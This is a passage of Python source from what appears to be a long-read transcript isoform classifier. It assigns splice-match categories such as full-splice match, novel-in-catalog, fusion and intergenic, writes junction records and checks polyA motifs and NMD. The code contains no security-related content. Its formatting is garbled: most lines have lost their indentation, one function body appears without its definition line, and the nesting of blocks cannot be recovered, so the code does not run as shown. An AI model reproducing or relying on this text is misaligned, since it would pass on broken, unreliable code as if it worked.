isoform_hit.tss_gene_diff = nearest_start_diff if nearest_start_diff!=float('inf') else 'NA'
isoform_hit.tts_gene_diff = nearest_end_diff if nearest_end_diff!=float('inf') else 'NA'
else:
            isoform_hit.tss_gene_diff = -nearest_end_diff if nearest_end_diff!=float('inf') else 'NA'
            isoform_hit.tts_gene_diff = -nearest_start_diff if nearest_start_diff!=float('inf') else 'NA'
def categorize_incomplete_matches(trec, ref):
"""
intron_retention --- at least one trec exon covers at least two adjacent ref exons
        complete --- all junctions agree and it is not intron retention
        5prime_fragment --- all junctions agree but trec has fewer 5' exons
        3prime_fragment --- all junctions agree but trec has fewer 3' exons
        internal_fragment --- all junctions agree but trec has fewer 5' and 3' exons
"""
# check intron retention
ref_exon_tree = IntervalTree()
for i,e in enumerate(ref.exons): ref_exon_tree.insert(e.start, e.end, i)
for e in trec.exons:
if len(ref_exon_tree.find(e.start, e.end)) > 1: # multiple ref exons covered
return "intron_retention"
agree_front = trec.junctions[0]==ref.junctions[0]
agree_end = trec.junctions[-1]==ref.junctions[-1]
if agree_front:
if agree_end:
return "complete"
else: # front agrees, end does not
return ("3prime_fragment" if trec.strand=='+' else '5prime_fragment')
else:
if agree_end: # front does not agree, end agrees
return ("5prime_fragment" if trec.strand=='+' else '3prime_fragment')
else:
return "internal_fragment"
# Transcript information for a single query id and comparison with reference.
# Intra-priming: calculate percentage of "A"s right after the end
if trec.strand == "+":
pos_TTS = trec.exonEnds[-1]
seq_downTTS = str(genome_dict[trec.chrom].seq[pos_TTS:pos_TTS+nPolyA]).upper()
    else: # isoform on - strand
pos_TTS = trec.exonStarts[0]
seq_downTTS = str(genome_dict[trec.chrom].seq[pos_TTS-nPolyA:pos_TTS].reverse_complement()).upper()
percA = float(seq_downTTS.count('A'))/nPolyA*100
isoform_hit = myQueryTranscripts(id=trec.id, tts_diff="NA", tss_diff="NA",\
num_exons=trec.exonCount,
length=trec.length,
str_class="", \
chrom=trec.chrom,
strand=trec.strand, \
subtype="no_subcategory",\
percAdownTTS=str(percA),\
seqAdownTTS=seq_downTTS)
##***************************************##
########### SPLICED TRANSCRIPTS ###########
##***************************************##
cat_ranking = {'full-splice_match': 5, 'incomplete-splice_match': 4, 'anyKnownJunction': 3, 'anyKnownSpliceSite': 2,
'geneOverlap': 1, '': 0}
#if trec.id.startswith('PB.1961.2'):
# pdb.set_trace()
if trec.exonCount >= 2:
hits_by_gene = defaultdict(lambda: []) # gene --> list of hits
best_by_gene = {} # gene --> best isoform_hit
if trec.chrom in refs_exons_by_chr:
for ref in refs_exons_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
hits_by_gene[ref.gene].append(ref)
if trec.chrom in refs_1exon_by_chr:
for ref in refs_1exon_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
hits_by_gene[ref.gene].append(ref)
if len(hits_by_gene) == 0: return isoform_hit
for ref_gene in hits_by_gene:
isoform_hit = myQueryTranscripts(id=trec.id, tts_diff="NA", tss_diff="NA", \
num_exons=trec.exonCount,
length=trec.length,
str_class="", \
chrom=trec.chrom,
strand=trec.strand, \
subtype="no_subcategory", \
percAdownTTS=str(percA), \
seqAdownTTS=seq_downTTS)
for ref in hits_by_gene[ref_gene]:
if trec.strand != ref.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
#if trec.id.startswith('PB.102.9'):
# pdb.set_trace()
if ref.exonCount == 1: # mono-exonic reference, handle specially here
if calc_exon_overlap(trec.exons, ref.exons) > 0 and cat_ranking[isoform_hit.str_class] < cat_ranking["geneOverlap"]:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
"geneOverlap",
subtype="mono-exon",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=0,
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
else: # multi-exonic reference
match_type = compare_junctions(trec, ref, internal_fuzzy_max_dist=0, max_5_diff=999999, max_3_diff=999999)
if match_type not in ('exact', 'subset', 'partial', 'concordant', 'super', 'nomatch'):
raise Exception("Unknown match category {0}!".format(match_type))
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
                    #has_overlap = gene_overlap(isoform_hit.genes[-1], ref.gene) if len(isoform_hit.genes) >= 1 else False
# #############################
# SQANTI's full-splice_match
# #############################
if match_type == "exact":
subtype = "multi-exon"
# assign as a new hit if
# (1) no prev hits yet
# (2) this one is better (prev not FSM or is FSM but worse tss/tts)
if cat_ranking[isoform_hit.str_class] < cat_ranking["full-splice_match"] or \
abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff():
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length,
str_class="full-splice_match",
subtype=subtype,
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen = ref.length,
refExons= ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
# #######################################################
# SQANTI's incomplete-splice_match
                    # (only check if we don't already have an FSM match)
# #######################################################
elif match_type == "subset":
subtype = categorize_incomplete_matches(trec, ref)
# assign as a new (ISM) hit if
# (1) no prev hit
# (2) prev hit not as good (is ISM with worse tss/tts or anyKnownSpliceSite)
if cat_ranking[isoform_hit.str_class] < cat_ranking["incomplete-splice_match"] or \
(isoform_hit.str_class=='incomplete-splice_match' and abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff()):
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length,
str_class="incomplete-splice_match",
subtype=subtype,
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen = ref.length,
refExons= ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
# #######################################################
# Some kind of junction match that isn't ISM/FSM
# #######################################################
elif match_type in ('partial', 'concordant', 'super'):
q_sp_hit = calc_splicesite_agreement(trec.exons, ref.exons)
q_ex_overlap = calc_exon_overlap(trec.exons, ref.exons)
q_exon_d = abs(trec.exonCount - ref.exonCount)
if cat_ranking[isoform_hit.str_class] < cat_ranking["anyKnownJunction"] or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit > isoform_hit.q_splicesite_hit) or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit==isoform_hit.q_splicesite_hit and q_ex_overlap > isoform_hit.q_exon_overlap) or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit==isoform_hit.q_splicesite_hit and q_exon_d < abs(trec.exonCount-isoform_hit.refExons)):
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="anyKnownJunction",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
else: # must be nomatch
assert match_type == 'nomatch'
# at this point, no junction overlap, but may be a single splice site (donor or acceptor) match?
# also possibly just exonic (no splice site) overlap
if cat_ranking[isoform_hit.str_class] < cat_ranking["anyKnownSpliceSite"] and calc_splicesite_agreement(trec.exons, ref.exons) > 0:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="anyKnownSpliceSite",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons,
ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
if isoform_hit.str_class=="": # still not hit yet, check exonic overlap
if cat_ranking[isoform_hit.str_class] < cat_ranking["geneOverlap"] and calc_exon_overlap(trec.exons, ref.exons) > 0:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="geneOverlap",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
best_by_gene[ref_gene] = isoform_hit
# now we have best_by_gene:
# start with the best scoring one (FSM is best) --> can add other genes if they don't overlap
#if trec.id.startswith('PB.1252.'):
# pdb.set_trace()
geneHitTuple = namedtuple('geneHitTuple', ['score', 'rStart', 'rEnd', 'rGene', 'iso_hit'])
best_by_gene = [geneHitTuple(cat_ranking[iso_hit.str_class],iso_hit.refStart,iso_hit.refEnd,ref_gene,iso_hit) for ref_gene,iso_hit in best_by_gene.items()]
best_by_gene = list(filter(lambda x: x.score > 0, best_by_gene))
if len(best_by_gene) == 0: # no hit
return isoform_hit
# sort matching genes by ranking, allow for multi-gene match as long as they don't overlap
# cat_ranking = {'full-splice_match': 5, 'incomplete-splice_match': 4, 'anyKnownJunction': 3, 'anyKnownSpliceSite': 2,
# 'geneOverlap': 1, '': 0}
        # sort by (ranking score, overlap)
        best_by_gene.sort(key=lambda x: (x.score,
                                         x.iso_hit.q_splicesite_hit
                                         + (x.iso_hit.q_exon_overlap) * 1. / sum(e.end - e.start for e in trec.exons)
                                         + calc_overlap(x.rStart, x.rEnd, trec.txStart, trec.txEnd) * 1. / (x.rEnd - x.rStart)
                                         - abs(trec.exonCount - x.iso_hit.refExons)),
                          reverse=True)
isoform_hit = best_by_gene[0].iso_hit
cur_start, cur_end = best_by_gene[0].rStart, best_by_gene[0].rEnd
for t in best_by_gene[1:]:
if t.score==0: break
if calc_overlap(cur_start, cur_end, t.rStart, t.rEnd) <= 0:
isoform_hit.genes.append(t.rGene)
cur_start, cur_end = min(cur_start, t.rStart), max(cur_end, t.rEnd)
##***************************************####
########### UNSPLICED TRANSCRIPTS ###########
##***************************************####
    else: # single-exon isoform
if trec.chrom in refs_1exon_by_chr:
for ref in refs_1exon_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
if ref.strand != trec.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
# see if there's already an existing match AND if so, if this one is better
if isoform_hit.str_class == "": # no match so far
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length, "full-splice_match",
subtype="mono-exon",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen=ref.length,
refExons = ref.exonCount,
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
elif abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff():
isoform_hit.modify(ref.id, ref.gene, diff_tss, diff_tts, ref.length, ref.exonCount)
if isoform_hit.str_class == "" and trec.chrom in refs_exons_by_chr:
# no hits to single exon genes, let's see if it hits multi-exon genes
# (1) if it overlaps with a ref exon and is contained in an exon, we call it ISM
# (2) else, if it is completely within a ref gene start-end region, we call it NIC by intron retention
for ref in refs_exons_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
if calc_exon_overlap(trec.exons, ref.exons) == 0: # no exonic overlap, skip!
continue
if ref.strand != trec.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
for e in ref.exons:
if e.start <= trec.txStart < trec.txEnd <= e.end:
isoform_hit.str_class = "incomplete-splice_match"
isoform_hit.subtype = "mono-exon"
isoform_hit.modify(ref.id, ref.gene, diff_tss, diff_tts, ref.length, ref.exonCount)
# this is as good a match as it gets, we can stop the search here
get_gene_diff_tss_tts(isoform_hit)
return isoform_hit
# if we haven't exited here, then ISM hit is not found yet
# instead check if it's NIC by intron retention
# but we don't exit here since the next gene could be a ISM hit
if ref.txStart <= trec.txStart < trec.txEnd <= ref.txEnd:
isoform_hit.str_class = "novel_in_catalog"
isoform_hit.subtype = "mono-exon"
# check for intron retention
if len(ref.junctions) > 0:
for (d,a) in ref.junctions:
if trec.txStart < d < a < trec.txEnd:
isoform_hit.subtype = "mono-exon_by_intron_retention"
break
isoform_hit.modify("novel", ref.gene, 'NA', 'NA', ref.length, ref.exonCount)
get_gene_diff_tss_tts(isoform_hit)
return isoform_hit
# if we get to here, means neither ISM nor NIC, so just add a ref gene and categorize further later
isoform_hit.genes.append(ref.gene)
get_gene_diff_tss_tts(isoform_hit)
isoform_hit.genes.sort(key=lambda x: start_ends_by_gene[x]['begin'])
return isoform_hit
def novelIsoformsKnownGenes(isoforms_hit, trec, junctions_by_chr, junctions_by_gene, start_ends_by_gene):
"""
At this point: definitely not FSM or ISM, see if it is NIC, NNC, or fusion
:return isoforms_hit: updated isoforms hit (myQueryTranscripts object)
"""
def has_intron_retention():
for e in trec.exons:
m = bisect.bisect_left(junctions_by_chr[trec.chrom]['da_pairs'], (e.start, e.end))
if m < len(junctions_by_chr[trec.chrom]['da_pairs']) and e.start <= junctions_by_chr[trec.chrom]['da_pairs'][m][0] < junctions_by_chr[trec.chrom]['da_pairs'][m][1] < e.end:
return True
return False
ref_genes = list(set(isoforms_hit.genes))
#if trec.id.startswith('PB.37872'):
#pdb.set_trace()
#
# at this point, we have already found matching genes/transcripts
# hence we do not need to update refLen or refExon
# or tss_diff and tts_diff (always set to "NA" for non-FSM/ISM matches)
#
isoforms_hit.transcripts = ["novel"]
if len(ref_genes) == 1:
# hits exactly one gene, must be either NIC or NNC
ref_gene_junctions = junctions_by_gene[ref_genes[0]]
# 1. check if all donors/acceptor sites are known (regardless of which ref gene it came from)
# 2. check if this query isoform uses a subset of the junctions from the single ref hit
all_junctions_known = True
all_junctions_in_hit_ref = True
for d,a in trec.junctions:
all_junctions_known = all_junctions_known and (d in junctions_by_chr[trec.chrom]['donors']) and (a in junctions_by_chr[trec.chrom]['acceptors'])
all_junctions_in_hit_ref = all_junctions_in_hit_ref and ((d,a) in ref_gene_junctions)
if all_junctions_known:
isoforms_hit.str_class="novel_in_catalog"
if all_junctions_in_hit_ref:
isoforms_hit.subtype = "combination_of_known_junctions"
else:
isoforms_hit.subtype = "combination_of_known_splicesites"
else:
isoforms_hit.str_class="novel_not_in_catalog"
isoforms_hit.subtype = "at_least_one_novel_splicesite"
else: # see if it is fusion
# list of a ref junctions from all genes, including potential shared junctions
# NOTE: some ref genes could be mono-exonic so no junctions
        all_ref_junctions = list(itertools.chain.from_iterable(junctions_by_gene[ref_gene] for ref_gene in ref_genes if ref_gene in junctions_by_gene))
# (junction index) --> number of refs that have this junction
junction_ref_hit = dict((i, all_ref_junctions.count(junc)) for i,junc in enumerate(trec.junctions))
# if the same query junction appears in more than one of the hit references, it is not a fusion
if max(junction_ref_hit.values()) > 1:
isoforms_hit.str_class = "moreJunctions"
else:
isoforms_hit.str_class = "fusion"
isoforms_hit.subtype = "mono-exon" if trec.exonCount==1 else "multi-exon"
if has_intron_retention():
isoforms_hit.subtype = "intron_retention"
return isoforms_hit
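# Illustrative sketch (not part of the original script): the core NIC vs NNC decision made in
# novelIsoformsKnownGenes(), reduced to plain Python sets. All coordinates are made up.
def _example_nic_vs_nnc():
    known_donors = {100, 500}
    known_acceptors = {200, 600}
    ref_gene_junctions = {(100, 200)}           # junctions annotated for the single matched gene
    query_junctions = [(100, 200), (500, 600)]  # junctions observed in the query isoform
    all_known = all(d in known_donors and a in known_acceptors for d, a in query_junctions)
    all_in_ref = all((d, a) in ref_gene_junctions for d, a in query_junctions)
    if all_known:
        # novel_in_catalog: either a new combination of known junctions or of known splice sites
        return "combination_of_known_junctions" if all_in_ref else "combination_of_known_splicesites"
    # at least one splice site is unannotated -> novel_not_in_catalog
    return "novel_not_in_catalog"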
def associationOverlapping(isoforms_hit, trec, junctions_by_chr):
# at this point: definitely not FSM or ISM or NIC or NNC
# possibly (in order of preference assignment):
# - antisense (on opp strand of a known gene)
# - genic (overlaps a combination of exons and introns), ignore strand
# - genic_intron (completely within an intron), ignore strand
# - intergenic (does not overlap a gene at all), ignore strand
isoforms_hit.str_class = "intergenic"
isoforms_hit.transcripts = ["novel"]
isoforms_hit.subtype = "mono-exon" if trec.exonCount==1 else "multi-exon"
#if trec.id.startswith('PB.37872.'):
# pdb.set_trace()
if len(isoforms_hit.genes) == 0:
# completely no overlap with any genes on the same strand
# check if it is anti-sense to a known gene, otherwise it's genic_intron or intergenic
if len(isoforms_hit.AS_genes) == 0 and trec.chrom in junctions_by_chr:
# no hit even on opp strand
# see if it is completely contained within a junction
da_pairs = junctions_by_chr[trec.chrom]['da_pairs']
i = bisect.bisect_left(da_pairs, (trec.txStart, trec.txEnd))
while i < len(da_pairs) and da_pairs[i][0] <= trec.txStart:
                if da_pairs[i][0] <= trec.txStart <= trec.txEnd <= da_pairs[i][1]:
isoforms_hit.str_class = "genic_intron"
break
i += 1
else:
# hits one or more genes on the opposite strand
isoforms_hit.str_class = "antisense"
isoforms_hit.genes = ["novelGene_{g}_AS".format(g=g) for g in isoforms_hit.AS_genes]
else:
# (Liz) used to put NNC here - now just genic
isoforms_hit.str_class = "genic"
# overlaps with one or more genes on the same strand
#if trec.exonCount >= 2:
# # multi-exon and has a same strand gene hit, must be NNC
# isoforms_hit.str_class = "novel_not_in_catalog"
# isoforms_hit.subtype = "at_least_one_novel_splicesite"
#else:
# # single exon, must be genic
# isoforms_hit.str_class = "genic"
return isoforms_hit
def write_junctionInfo(trec, junctions_by_chr, accepted_canonical_sites, indelInfo, genome_dict, fout, covInf=None, covNames=None, phyloP_reader=None):
"""
:param trec: query isoform genePredRecord
:param junctions_by_chr: dict of chr -> {'donors': <sorted list of donors>, 'acceptors': <sorted list of acceptors>, 'da_pairs': <sorted list of junctions>}
:param accepted_canonical_sites: list of accepted canonical splice sites
:param indelInfo: indels near junction information, dict of pbid --> list of junctions near indel (in Interval format)
:param genome_dict: genome fasta dict
:param fout: DictWriter handle
:param covInf: (optional) junction coverage information, dict of (chrom,strand) -> (0-based start,1-based end) -> dict of {sample -> unique read count}
:param covNames: (optional) list of sample names for the junction coverage information
:param phyloP_reader: (optional) dict of (chrom,0-based coord) --> phyloP score
Write a record for each junction in query isoform
"""
def find_closest_in_list(lst, pos):
i = bisect.bisect_left(lst, pos)
if i == 0:
return lst[0]-pos
elif i == len(lst):
return lst[-1]-pos
else:
a, b = lst[i-1]-pos, lst[i]-pos
if abs(a) < abs(b): return a
else: return b
if trec.chrom not in junctions_by_chr:
# nothing to do
return
# go through each trec junction
for junction_index, (d, a) in enumerate(trec.junctions):
# NOTE: donor just means the start, not adjusted for strand
# find the closest junction start site
min_diff_s = -find_closest_in_list(junctions_by_chr[trec.chrom]['donors'], d)
# find the closest junction end site
min_diff_e = find_closest_in_list(junctions_by_chr[trec.chrom]['acceptors'], a)
splice_site = trec.get_splice_site(genome_dict, junction_index)
indel_near_junction = "NA"
if indelInfo is not None:
indel_near_junction = "TRUE" if (trec.id in indelInfo and Interval(d,a) in indelInfo[trec.id]) else "FALSE"
sample_cov = defaultdict(lambda: 0) # sample -> unique count for this junction
if covInf is not None:
sample_cov = covInf[(trec.chrom, trec.strand)][(d,a)]
# if phyloP score dict exists, give the triplet score of (last base in donor exon), donor site -- similarly for acceptor
phyloP_start, phyloP_end = 'NA', 'NA'
if phyloP_reader is not None:
phyloP_start = ",".join([str(x) for x in [phyloP_reader.get_pos(trec.chrom, d-1), phyloP_reader.get_pos(trec.chrom, d), phyloP_reader.get_pos(trec.chrom, d+1)]])
phyloP_end = ",".join([str(x) for x in [phyloP_reader.get_pos(trec.chrom, a-1), phyloP_reader.get_pos(trec.chrom, a),
phyloP_reader.get_pos(trec.chrom, a+1)]])
qj = {'isoform': trec.id,
'junction_number': "junction_"+str(junction_index+1),
"chrom": trec.chrom,
"strand": trec.strand,
"genomic_start_coord": d+1, # write out as 1-based start
"genomic_end_coord": a, # already is 1-based end
"transcript_coord": "?????", # this is where the exon ends w.r.t to id sequence, ToDo: implement later
"junction_category": "known" if ((d,a) in junctions_by_chr[trec.chrom]['da_pairs']) else "novel",
"start_site_category": "known" if min_diff_s==0 else "novel",
"end_site_category": "known" if min_diff_e==0 else "novel",
"diff_to_Ref_start_site": min_diff_s,
"diff_to_Ref_end_site": min_diff_e,
"bite_junction": "TRUE" if (min_diff_s==0 or min_diff_e==0) else "FALSE",
"splice_site": splice_site,
"canonical": "canonical" if splice_site in accepted_canonical_sites else "non_canonical",
"RTS_junction": "????", # First write ???? in _tmp, later is TRUE/FALSE
"indel_near_junct": indel_near_junction,
"phyloP_start": phyloP_start,
"phyloP_end": phyloP_end,
"sample_with_cov": sum(cov!=0 for cov in sample_cov.values()) if covInf is not None else "NA",
"total_coverage": sum(sample_cov.values()) if covInf is not None else "NA"}
if covInf is not None:
for sample in covNames:
qj[sample] = sample_cov[sample]
fout.writerow(qj)
def isoformClassification(args, isoforms_by_chr, refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene, genome_dict, indelsJunc, orfDict):
## read coverage files if provided
if args.coverage is not None:
print("**** Reading Splice Junctions coverage files.", file=sys.stdout)
SJcovNames, SJcovInfo = STARcov_parser(args.coverage)
fields_junc_cur = FIELDS_JUNC + SJcovNames # add the samples to the header
else:
SJcovNames, SJcovInfo = None, None
print("Splice Junction Coverage files not provided.", file=sys.stdout)
fields_junc_cur = FIELDS_JUNC
if args.cage_peak is not None:
print("**** Reading CAGE Peak data.", file=sys.stdout)
cage_peak_obj = CAGEPeak(args.cage_peak)
else:
cage_peak_obj = None
if args.polyA_peak is not None:
print("**** Reading polyA Peak data.", file=sys.stdout)
polya_peak_obj = PolyAPeak(args.polyA_peak)
else:
polya_peak_obj = None
if args.polyA_motif_list is not None:
print("**** Reading PolyA motif list.", file=sys.stdout)
polyA_motif_list = []
for line in open(args.polyA_motif_list):
x = line.strip().upper().replace('U', 'A')
if any(s not in ('A','T','C','G') for s in x):
print("PolyA motif must be A/T/C/G only! Saw: {0}. Abort!".format(x), file=sys.stderr)
sys.exit(-1)
polyA_motif_list.append(x)
else:
polyA_motif_list = None
if args.phyloP_bed is not None:
print("**** Reading PhyloP BED file.", file=sys.stdout)
phyloP_reader = LazyBEDPointReader(args.phyloP_bed)
else:
phyloP_reader = None
# running classification
print("**** Performing Classification of Isoforms....", file=sys.stdout)
accepted_canonical_sites = list(args.sites.split(","))
handle_class = open(outputClassPath+"_tmp", "w")
fout_class = DictWriter(handle_class, fieldnames=FIELDS_CLASS, delimiter='\t')
fout_class.writeheader()
#outputJuncPath = outputPathPrefix+"_junctions.txt"
handle_junc = open(outputJuncPath+"_tmp", "w")
fout_junc = DictWriter(handle_junc, fieldnames=fields_junc_cur, delimiter='\t')
fout_junc.writeheader()
isoforms_info = {}
novel_gene_index = 1
for chrom,records in isoforms_by_chr.items():
for rec in records:
# Find best reference hit
isoform_hit = transcriptsKnownSpliceSites(refs_1exon_by_chr, refs_exons_by_chr, start_ends_by_gene, rec, genome_dict, nPolyA=args.window)
if isoform_hit.str_class in ("anyKnownJunction", "anyKnownSpliceSite"):
# not FSM or ISM --> see if it is NIC, NNC, or fusion
isoform_hit = novelIsoformsKnownGenes(isoform_hit, rec, junctions_by_chr, junctions_by_gene, start_ends_by_gene)
elif isoform_hit.str_class in ("", "geneOverlap"):
# possibly NNC, genic, genic intron, anti-sense, or intergenic
isoform_hit = associationOverlapping(isoform_hit, rec, junctions_by_chr)
# write out junction information
write_junctionInfo(rec, junctions_by_chr, accepted_canonical_sites, indelsJunc, genome_dict, fout_junc, covInf=SJcovInfo, covNames=SJcovNames, phyloP_reader=phyloP_reader)
if isoform_hit.str_class in ("intergenic", "genic_intron"):
# Liz: I don't find it necessary to cluster these novel genes. They should already be always non-overlapping.
if args.novel_gene_prefix is not None: # used by splits to not have redundant novelGene IDs
isoform_hit.genes = ['novelGene_' + str(args.novel_gene_prefix) + '_' + str(novel_gene_index)]
else:
isoform_hit.genes = ['novelGene_' + str(novel_gene_index)]
isoform_hit.transcripts = ['novel']
novel_gene_index += 1
# look at Cage Peak info (if available)
if cage_peak_obj is not None:
if rec.strand == '+':
within_cage, dist_cage = cage_peak_obj.find(rec.chrom, rec.strand, rec.txStart)
else:
within_cage, dist_cage = cage_peak_obj.find(rec.chrom, rec.strand, rec.txEnd)
isoform_hit.within_cage = within_cage
isoform_hit.dist_cage = dist_cage
# look at PolyA Peak info (if available)
if polya_peak_obj is not None:
if rec.strand == '+':
within_polya_site, dist_polya_site = polya_peak_obj.find(rec.chrom, rec.strand, rec.txStart)
else:
within_polya_site, dist_polya_site = polya_peak_obj.find(rec.chrom, rec.strand, rec.txEnd)
isoform_hit.within_polya_site = within_polya_site
isoform_hit.dist_polya_site = dist_polya_site
# polyA motif finding: look within 50 bp upstream of 3' end for the highest ranking polyA motif signal (user provided)
if polyA_motif_list is not None:
if rec.strand == '+':
polyA_motif, polyA_dist = find_polyA_motif(str(genome_dict[rec.chrom][rec.txEnd-50:rec.txEnd].seq), polyA_motif_list)
else:
polyA_motif, polyA_dist = find_polyA_motif(str(genome_dict[rec.chrom][rec.txStart:rec.txStart+50].reverse_complement().seq), polyA_motif_list)
isoform_hit.polyA_motif = polyA_motif
isoform_hit.polyA_dist = polyA_dist
# Fill in ORF/coding info and NMD detection
if rec.id in orfDict:
isoform_hit.coding = "coding"
isoform_hit.ORFlen = orfDict[rec.id].orf_length
isoform_hit.CDS_start = orfDict[rec.id].cds_start # 1-based start
isoform_hit.CDS_end = orfDict[rec.id].cds_end # 1-based end
m = {} # transcript coord (0-based) --> genomic coord (0-based)
if rec.strand == '+':
i = 0
for exon in rec.exons:
for c in range(exon.start, exon.end):
m[i] = c
i += 1
else: # - strand
i = 0
for exon in rec.exons:
for c in range(exon.start, exon.end):
m[rec.length-i-1] = c
i += 1
orfDict[rec.id].cds_genomic_start = m[orfDict[rec.id].cds_start-1] + 1 # make it 1-based
orfDict[rec.id].cds_genomic_end = m[orfDict[rec.id].cds_end-1] + 1 # make it 1-based
isoform_hit.CDS_genomic_start = orfDict[rec.id].cds_genomic_start
isoform_hit.CDS_genomic_end = orfDict[rec.id].cds_genomic_end
                if orfDict[rec.id].cds_genomic_start is None: # likely SAM CIGAR mapping issue coming from aligner
                    pass # skip only the NMD detection below; still record and write out this isoform
                elif len(rec.junctions) > 0:
                    # NMD detection
                    # if + strand, see if CDS stop is before the last junction
                    if rec.strand == '+':
                        dist_to_last_junc = orfDict[rec.id].cds_genomic_end - rec.junctions[-1][0]
                    else: # - strand
                        dist_to_last_junc = rec.junctions[0][1] - orfDict[rec.id].cds_genomic_end
                    isoform_hit.is_NMD = "TRUE" if dist_to_last_junc < 0 else "FALSE"
isoforms_info[rec.id] = isoform_hit
fout_class.writerow(isoform_hit.as_dict())
handle_class.close()
handle_junc.close()
return isoforms_info
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
mean = sum(data)*1. / n # mean
var = sum(pow(x - mean, 2) for x in data) / n # variance
return math.sqrt(var) # standard deviation
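# Quick illustrative check (not part of the original script): population standard deviation of a
# made-up list of per-junction coverages; the expected result is 2.0.
def _example_pstdev():
    return pstdev([2, 4, 4, 4, 5, 5, 7, 9])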
def find_polyA_motif(genome_seq, polyA_motif_list):
"""
:param genome_seq: genomic sequence to search polyA motifs from, must already be oriented
:param polyA_motif_list: ranked list of motifs to find, report the top one found
:return: polyA_motif, polyA_dist (how many bases upstream is this found)
"""
for motif in polyA_motif_list:
i = genome_seq.find(motif)
if i >= 0:
return motif, -(len(genome_seq)-i-len(motif)+1)
return 'NA', 'NA'
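# Illustrative sketch (not part of the original script): how find_polyA_motif() reports its hit.
# The sequence and motif list are made up; motifs are tried in the given (ranked) order.
def _example_find_polyA_motif():
    seq = "GGGAATAAAGG"  # already oriented, i.e. the last 11 bp upstream of a hypothetical 3' end
    motif, dist = find_polyA_motif(seq, ["AATAAA", "ATTAAA"])
    # 'AATAAA' is found at index 3, so dist = -(len(seq) - 3 - len('AATAAA') + 1) = -3
    return motif, dist  # -> ('AATAAA', -3)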
def FLcount_parser(fl_count_filename):
"""
:param fl_count_filename: could be a single sample or multi-sample (chained or demux) count file
:return: list of samples, <dict>
If single sample, returns True, dict of {pbid} -> {count}
If multiple sample, returns False, dict of {pbid} -> {sample} -> {count}
For multi-sample, acceptable formats are:
//demux-based
id,JL3N,FL1N,CL1N,FL3N,CL3N,JL1N
PB.2.1,0,0,1,0,0,1
PB.3.3,33,14,47,24,15,38
PB.3.2,2,1,0,0,0,1
//chain-based
superPBID<tab>sample1<tab>sample2
"""
fl_count_dict = {}
samples = ['NA']
flag_single_sample = True
f = open(fl_count_filename)
while True:
cur_pos = f.tell()
line = f.readline()
if not line.startswith('#'):
            # the first non-comment line tells us the format: pbid, superPBID, or id
if line.startswith('pbid'):
